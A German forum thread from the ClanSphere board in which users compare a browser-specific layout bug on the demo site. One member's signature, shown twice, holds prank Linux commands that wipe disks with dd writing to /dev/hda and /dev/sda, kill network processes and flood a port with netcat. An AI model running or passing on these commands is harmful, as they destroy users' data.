Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
freeman


King for a day





Beiträge: 267
# Thema - 30.09.2006 um 14:45 Uhr
Ich glaube da ist ein fehler schaut selbst :





habt ihr die seite nur für FF gemacht weil da ist es ok aber im IE oder CB schaut das so aus.


------------------
Gruss Free...

P.S. Ich weis das meine Rechtschreibung scheisse ist allso Bitte lass die Kommentare, Danke.

========================================


My World +-
Inaktiv
Rider


Going for pro




Beiträge: 406
# Antwort: 1 - 30.09.2006 um 14:48 Uhr
das habe ich eben schonmal gelesen ich glaube es wird dran gearbeiten und betrifft nur den IE 6


Inaktiv
|
freeman
Thread-Ersteller


King for a day





Beiträge: 267
# Antwort: 2 - 30.09.2006 um 14:49 Uhr
ok sorry hab ich nicht gesehen, danke für die info


------------------
Gruss Free...

P.S. Ich weis das meine Rechtschreibung scheisse ist allso Bitte lass die Kommentare, Danke.

========================================


My World +-


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 3 - 30.09.2006 um 15:08 Uhr
das habe ich eben schonmal gelesen ich glaube es wird dran gearbeiten und betrifft nur den IE 6



Nein. Es betriff auch meinen Opera (Auflösung 1024*768).


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
denimator


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 4 - 30.09.2006 um 15:11 Uhr
kann auch bestätigen, dass es den IE7RC1 betrifft

[Wenn ihr da eine Lösung habt, könnt ihr die auch veröffentlichen, denn bei meiner Page sieht das genauso aus]


------------------
mit freundlichen Grüßen - Denimator



Inaktiv
|
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 5 - 30.09.2006 um 16:21 Uhr
darf ich mal nachfragen auf welcher Seite ihr euch genau bewegt ?

habe hier Opera, Firefox, IE6, IE7RC1

und nur beim IE 6 sind probleme und das auch nur bei Project...


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 6 - 30.09.2006 um 16:41 Uhr
Also was ich heute morgen bemerkt habe ist, dass _h4ze einen Post gehabt hat. Mein Post darunter da war das Moderator unter dem Image.

Bei diesem Thread ist es aber wieder daneben.

Komisch


edit1:

http://clansphere.net/index.php?mod=board&action=thread&where=32&start=0#com5

Also bei mir wird hier mein Name derzeit richtig unter dem Bild angezeigt so wie es auch sein sollte.

Ich glaube das Clansphere einfach nurmeinen Namen nicht mehr mag, weil ich zuviele Bugs gefunden hatte -.- ^^


edit2:

Ich sehe gerade, dass er mal das Moderator mal richtig und mal falsch darstellt. Also mal neben undmal unter dem Bild ^^.

Also liegt es doch nicht an meinem Namen *freu*


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Zuletzt editiert von pHaeno* ClanSphere Team am 30.09.2006 um 16:50 Uhr (2x Editiert)
Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.